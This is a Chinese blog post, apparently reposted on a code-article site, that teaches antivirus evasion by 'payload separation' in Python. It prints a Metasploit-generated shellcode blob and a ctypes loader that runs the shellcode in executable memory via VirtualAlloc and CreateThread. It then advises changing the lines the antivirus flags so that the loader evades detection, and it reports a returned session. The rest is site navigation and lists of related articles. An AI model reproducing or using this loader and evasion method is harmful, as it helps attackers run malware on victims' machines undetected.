编程 Python

通过Python实现Payload分离免杀过程详解

Posted in Python onJuly 13, 2020

缺点：

编译成exe以后体积过大

实现：

msf生成shellcode代码：

通过Python实现Payload分离免杀过程详解

将payload给copy下来，去除引号。

\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42
\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33
\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66
\x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x4a\x53
\x56\x34\x74\x53\x45\x49\x74\x4b\x50\x49\x74\x4d\x45\x58\x6a
\x6a\x53\x41\x48\x52\x55\x59\x74\x5a\x49\x41\x48\x54\x69\x30
\x6b\x59\x34\x7a\x70\x4a\x69\x7a\x53\x4c\x41\x64\x59\x78\x2f
\x36\x7a\x42\x7a\x77\x30\x42\x78\x7a\x6a\x67\x64\x66\x59\x44
\x66\x66\x67\x37\x66\x53\x52\x31\x35\x46\x69\x4c\x57\x43\x51
\x42\x30\x32\x61\x4c\x44\x45\x75\x4c\x57\x42\x77\x42\x30\x34
\x73\x45\x69\x77\x48\x51\x69\x55\x51\x6b\x4a\x46\x74\x62\x59
\x56\x6c\x61\x55\x66\x2f\x67\x58\x31\x39\x61\x69\x78\x4c\x72
\x6a\x56\x31\x6f\x4d\x7a\x49\x41\x41\x47\x68\x33\x63\x7a\x4a
\x66\x56\x47\x68\x4d\x64\x79\x59\x48\x69\x65\x6a\x2f\x30\x4c
\x69\x51\x41\x51\x41\x41\x4b\x63\x52\x55\x55\x47\x67\x70\x67
\x47\x73\x41\x2f\x39\x56\x71\x43\x6d\x6a\x41\x71\x41\x4d\x38
\x61\x41\x49\x41\x44\x51\x57\x4a\x35\x6c\x42\x51\x55\x46\x42
\x41\x55\x45\x42\x51\x61\x4f\x6f\x50\x33\x2b\x44\x2f\x31\x5a
\x64\x71\x45\x46\x5a\x58\x61\x4a\x6d\x6c\x64\x47\x48\x2f\x31
\x59\x58\x41\x64\x41\x72\x2f\x54\x67\x68\x31\x37\x4f\x68\x6e
\x41\x41\x41\x41\x61\x67\x42\x71\x42\x46\x5a\x58\x61\x41\x4c
\x5a\x79\x46\x2f\x2f\x31\x59\x50\x34\x41\x48\x34\x32\x69\x7a
\x5a\x71\x51\x47\x67\x41\x45\x41\x41\x41\x56\x6d\x6f\x41\x61
\x46\x69\x6b\x55\x2b\x58\x2f\x31\x5a\x4e\x54\x61\x67\x42\x57
\x55\x31\x64\x6f\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67
\x41\x66\x53\x68\x59\x61\x41\x42\x41\x41\x41\x42\x71\x41\x46
\x42\x6f\x43\x79\x38\x50\x4d\x50\x2f\x56\x56\x32\x68\x31\x62
\x6b\x31\x68\x2f\x39\x56\x65\x58\x76\x38\x4d\x4a\x41\x2b\x46
\x63\x50\x2f\x2f\x2f\x2b\x6d\x62\x2f\x2f\x2f\x2f\x41\x63\x4d
\x70\x78\x6e\x58\x42\x77\x37\x76\x77\x74\x61\x4a\x57\x61\x67
\x42\x54\x2f\x39\x55\x3d

将自己的代码放入第3行的shell_code位置。

import ctypes,base64
 
encode_shellcode = "shell_code"
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

以上代码是绝对会被查杀的，但是可以通过修改代码绕过。思路如下，先查找杀软查杀哪里，再修改杀软查杀的代码，同时保证正常运行。提示一下，查杀的代码再5-6行之间，对其进行修改即可。

返回session：

通过Python实现Payload分离免杀过程详解

免杀效果：

通过Python实现Payload分离免杀过程详解

参考资料：

https://github.com/TideSec/BypassAntiVirus

https://micro8.gitbook.io/micro8/

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持三水点靠木。

通过Python实现Payload分离免杀过程详解

- Author -

返回主页aptkekeo

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Python 相关文章推荐

Python处理JSON数据并生成条形图

Aug 05 Python

Tensorflow实现卷积神经网络用于人脸关键点识别

Mar 05 Python

python合并同类型excel表格的方法

Apr 01 Python

python 剪切移动文件的实现代码

Aug 02 Python

python3对接mysql数据库实例详解

Apr 30 Python

Python 实现还原已撤回的微信消息

Jun 18 Python

用Python抢火车票的简单小程序实现解析

Aug 14 Python

在Python中等距取出一个数组其中n个数的实现方式

Nov 27 Python

Python线程协作threading.Condition实现过程解析

Mar 12 Python

python用分数表示矩阵的方法实例

Jan 11 Python

有趣的二维码：使用MyQR和qrcode来制作二维码

May 10 Python

Python基础知识学习之类的继承

May 31 Python

python上selenium的弹框操作实现

Jul 13 #Python

python如何导入依赖包

Jul 13 #Python

python入门:argparse浅析 nargs='+'作用

Jul 12 #Python

浅谈Python 命令行参数argparse写入图片路径操作

Jul 12 #Python

Python实现封装打包自己写的代码,被python import

Jul 12 #Python

Django封装交互接口代码

Jul 12 #Python

在django中实现choices字段获取对应字段值

Jul 12 #Python

You might like

php中ob_flush函数和flush函数用法分析

2015/03/18 PHP

javascript 自定义事件初探

2009/08/21 Javascript

JavaScript控制Session操作方法

2013/01/17 Javascript

javascript获取网页中指定节点的父节点、子节点的方法小结

2013/04/24 Javascript

javascript静态页面传值的三种方法分享

2013/11/12 Javascript

jquery cookie的用法总结

2013/11/18 Javascript

js实现鼠标经过时图片滚动停止的方法

2015/02/16 Javascript

jQuery+CSS实现的网页二级下滑菜单效果

2015/08/25 Javascript

基于jquery实现鼠标滚轮驱动的图片切换效果

2015/10/26 Javascript

原生JavaScript实现Ajax的方法

2016/04/07 Javascript

zTree异步加载展开第一级节点的实现方法

2017/09/05 Javascript

vue全局使用axios的方法实例详解

2018/11/22 Javascript

如何使用less实现随机下雪动画详解

2019/01/02 Javascript

vue 使用axios 数据请求第三方插件的使用教程详解

2019/07/05 Javascript

Python实现批量转换文件编码的方法

2015/07/28 Python

Python日期时间对象转换为字符串的实例

2018/06/22 Python

python爬虫基于requests模块的get请求实现详解

2019/08/20 Python

Python中关于logging模块的学习笔记

2020/06/03 Python

Python如何输出整数

2020/06/07 Python

Python常用类型转换实现代码实例

2020/07/28 Python

pycharm如何设置官方中文(如何汉化)

2020/12/29 Python

python绘制雷达图实例讲解

2021/01/03 Python

html5文本内容_动力节点Java学院整理

2017/07/11 HTML / CSS

浅谈HTML5 FileReader分布读取文件以及其方法简介

2017/11/09 HTML / CSS

美国在线宠物用品商店：Entirely Pets

2017/01/01 全球购物

Sport-Thieme荷兰：购买体育用品

2019/08/25 全球购物

致短跑运动员广播稿

2014/01/09 职场文书

法学函授自我鉴定

2014/02/06 职场文书

共产党员公开承诺书

2014/03/25 职场文书

中学生2014国庆节演讲稿：不屈的民族

2014/09/21 职场文书

个人诉讼委托书范本

2014/10/17 职场文书

给老婆的检讨书（搞笑版）

2015/05/06 职场文书

毕业论文答辩稿范文

2015/06/23 职场文书

2019年度行政文员工作计划范本！

2019/07/04 职场文书

关于JavaScript 中 if包含逗号表达式

2021/11/27 Javascript

Golang并发工具Singleflight

2022/05/06 Golang